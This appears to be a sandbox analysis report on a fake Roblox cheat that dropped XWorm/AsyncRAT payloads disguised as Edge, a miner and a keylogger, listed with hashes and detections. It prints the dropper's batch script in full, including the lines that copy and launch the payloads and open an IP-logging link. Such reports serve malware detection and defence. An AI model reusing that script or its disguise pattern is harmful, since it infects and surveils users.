                                                                                                                SHA-512:72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.29...## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk

                                                                                                                C:\Users\user\AppData\Local\Temp\ msedge.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):166912
                                                                                                                Entropy (8bit):6.251413929646261
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
                                                                                                                MD5:D653AEF66E218FB009B43365919BBCE3
                                                                                                                SHA1:D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
                                                                                                                SHA-256:E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
                                                                                                                SHA-512:FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......L............................................................................ ............... ..H............text....... ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):140288
                                                                                                                Entropy (8bit):5.566968845764678
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
                                                                                                                MD5:3AFF3B824FC5BCD05EF4D8EEE176E443
                                                                                                                SHA1:422883493E21D605CB47CC08FD48CAEAD73F414C
                                                                                                                SHA-256:79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
                                                                                                                SHA-512:126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................ ........@.. ....................................@.....................................S.......<....................`....................................................... ............... ..H............text....... ...................... ..`.rsrc...<...........................@..@.reloc.......`......."..............@..B........................H........U...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                C:\Users\user\AppData\Local\Temp\Keyloger.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):168960
                                                                                                                Entropy (8bit):5.30703099621005
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
                                                                                                                MD5:520E97797B27B752130B3E982953CEAF
                                                                                                                SHA1:AB460DA7E69D43747D98A4F45F5BB09D0E971789
                                                                                                                SHA-256:8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
                                                                                                                SHA-512:3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?[.f............................."... ...@....@.. ....................................@.................................X"..S....@..Z............................................................................ ............... ..H............text........ ...................... ..`.rsrc...Z....@......................@..@.reloc..............................@..B................."......H........]..........&.....................................................(....*.r...p*. .x!.*..(....*.rc..p*. !...*.s.........s.........s.........s.........*.r...p*. .&..*.r'..p*. ~.H.*.r...p*. .(T.*.r...p*. ..$.*.rM..p*. C.?.*..((...*.r_..p*. [...*.r...p*. .A..*"(....+.*&(....&+.*.+5sR... .... .'..oS...(,...~....-.(G...(9...~....oT...&.-.*.r%..p*. S...*.ri..p*. ....*.r...p*.r...p*. ....*.r5..p*. *p{.*.ry..p*. ...*..............j..................sU..............*"(I...+.*:

                                                                                                                C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5720984
                                                                                                                Entropy (8bit):6.362394353465928
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
                                                                                                                MD5:27469372591B14FF1C57654FACB5E020
                                                                                                                SHA1:492C166CD0E6C8D122CA4687659BF047CD48AFD7
                                                                                                                SHA-256:3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
                                                                                                                SHA-512:0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..................M.....M...P.....9.......................9...M.....+.....M.....T............M.......O...T...(...T.;...S...T.....Rich....................PE..L................"......b4......... (/.......4...@..........................`......`/X...@.................................D.B.T....0..............."W..)......<[....@.p.....................@.......@.@.............4.<............................text...v`4......b4................. ..`.rdata..Rs....4..t...f4.............@..@.data....+....C..*....B.............@....rsrc........0........O.............@..@.reloc..<[.......\....T.............@..B................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\coin.bat

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):477
                                                                                                                Entropy (8bit):5.082252715861135
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5i1bhH0HR:ZMz0zsBiO4Z+O4ZOKoQR
                                                                                                                MD5:AAA81C149A8D65AC899AF053ECF582BC
                                                                                                                SHA1:A784DDE9304A2B8108180A652C9374BEF71500D9
                                                                                                                SHA-256:98818D1694AE946A32DEC4CAEA1FDD219650EF5A915CCA6A68E974C028A2FD69
                                                                                                                SHA-512:74B6B9A1EF22CE12E3CE5076C8A3B6D0BE1C52642C6E004D52255D23AFD3506496D84049CDF6F5E37F5238C5645E014E26D88046D196CDBD3DDA90B3A27BEA92
                                                                                                                Malicious:false
                                                                                                                Preview:%echo off..copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application..start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6..start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner..copy %temp%\Keyloger.exe %systemDrive%..start %systemDrive%\Keyloger.exe..start cmd..start https://2no.co/24RXx6

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2673
                                                                                                                Entropy (8bit):3.9826015805540664
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8SdkTATJHdidAKZdA1P4ehwiZUklqehly+3:8tMpOuy
                                                                                                                MD5:304C6D1B9386DAF0ED27A4EFEDB4CBFA
                                                                                                                SHA1:78ACC09398F543C4B3716D516B364FBE34825750
                                                                                                                SHA-256:C263E9DA6A9AE7211FCD410FD5C1A19DACBB57FAB7FB9A0BB78999ECF59359F1
                                                                                                                SHA-512:C9C7D2AC1486F56F27860B27CD1BDA896E1826CA80FECC37CBE37C5726E1A30B4B485CF1D294276BC47C74E24749ADDA71139D410B81003D6C99084A763EFFDD
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,.....d........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X&.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X&.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X&.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X&..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X(............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2675
                                                                                                                Entropy (8bit):4.002926419055548
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8sdkTATJHdidAKZdA1+4eh/iZUkAQkqehey+2:8HMYF9Qzy
                                                                                                                MD5:807736E84BD125C0CCD8CB661C1421D5
                                                                                                                SHA1:0116A9FB28ECEA71B976A23BB6CE4E46DEDC16AB
                                                                                                                SHA-256:1592ACF0ED8B361D9311FC6F462EAF77948134416DA678E3BF02677D03338214
                                                                                                                SHA-512:7101F510D7DDEB2F2F4BDBBB8B506F87128D15E472BB2189EDEB63231C1C184D2DA94951DA23BA7BDCD88247E10AF92F70C44D8E7C4E10F8027E753DF0465DD7
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,....[........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X&.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X&.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X&.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X&..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X(............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2689
                                                                                                                Entropy (8bit):4.007439343876962
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:80dkTAVHdidAKZdA1404eh7sFiZUkmgqeh7sEy+BX:8/M9Inay
                                                                                                                MD5:2DE298A8CE771484E06D3DE5AD616006
                                                                                                                SHA1:1EFF5F5D05156CDB5DAFD766A7436A3AD1D27DBD
                                                                                                                SHA-256:D1A45E76357AC7F74F6C23308A031293363982FF4804BFDFF9D4ED100F176D92
                                                                                                                SHA-512:EE95AAFEC126DE73F07AFFD411359CEA4431B06C6565B40AB5B0FA892AA3A7E61E613B2B7650A9FA55F728BE8BE2920118FFBC49B47B923A40497F3D8B63A544
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X&.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X&.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X&.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X&..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.996761702525746
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8djdkTATJHdidAKZdA1p4ehDiZUkwqehyy+R:8AMv5cy
                                                                                                                MD5:7C5DA5717DED558B4F10700B3C904C7F
                                                                                                                SHA1:3CA906EAC9904F38AC07D55BFDF681C26509D457
                                                                                                                SHA-256:5EE66C2224F6CB435BE1C6066E2B09B9E9BCE01CF3D7477EC01462E3724C550E
                                                                                                                SHA-512:0AFBFE28E51808B7DC6B9C9582F18C311732ED46361EE17C8A68F8802401F47094203F1B08A1F8965B04D917A73A5D241C9709862561F467212D65A18D5AF4FD
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,.....F.......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X&.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X&.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X&.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X&..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X(............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.988930153255884
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8jdkTATJHdidAKZdA1X4ehBiZUk1W1qehAy+C:8iMxb9gy
                                                                                                                MD5:AF1AF861E75CD5E02E62B3FF20B24399
                                                                                                                SHA1:F82355F261CC419C8AD1EB9E4E858BEF9E09C7F5
                                                                                                                SHA-256:B9BE0A6E557EA562FBEEEB830BE5F31F3DB11ED2239414F2A81DFFABFE5ECA3C
                                                                                                                SHA-512:7BF57AEE59E3C98B2F34787AA93E6EEBE2A195C7641BCE91E542E004327D8DA24B6E14626D6EDEBA2FB9EDC911C12E7FA4C65403681211845D69DF0B640E20E9
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,..............v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X&.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X&.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X&.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X&..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X(............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2679
                                                                                                                Entropy (8bit):3.998977678358186
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8xdkTATJHdidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbay+yT+:8wMyTcJTbxWOvTbay7T
                                                                                                                MD5:1F1D1E587DA66F30FFCB5C70637F03EE
                                                                                                                SHA1:0FDD4DFEB25F605CC16F305479D9D593AB7701A6
                                                                                                                SHA-256:78C2B35F8BE8C50C3073892D4093CE1F4D65550AF7665B9B01C5651E18E4E8EC
                                                                                                                SHA-512:C59A5C002FF90D9FA7F9B8ADB835115911F5D19F1BE982C64DD623DA2D84A2328C5287857916C3CF68663FD3B0A8F8EAE90A4D8D5DCBAB1C21118EC5D869B7EF
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...$+.,....+#.......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X&.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X&.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X&.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X&..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X(............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                Chrome Cache Entry: 69

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):2833
                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                Malicious:false
                                                                                                                URL:https://cdn.iplogger.org/favicon.ico
                                                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

                                                                                                                Chrome Cache Entry: 70

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2833
                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
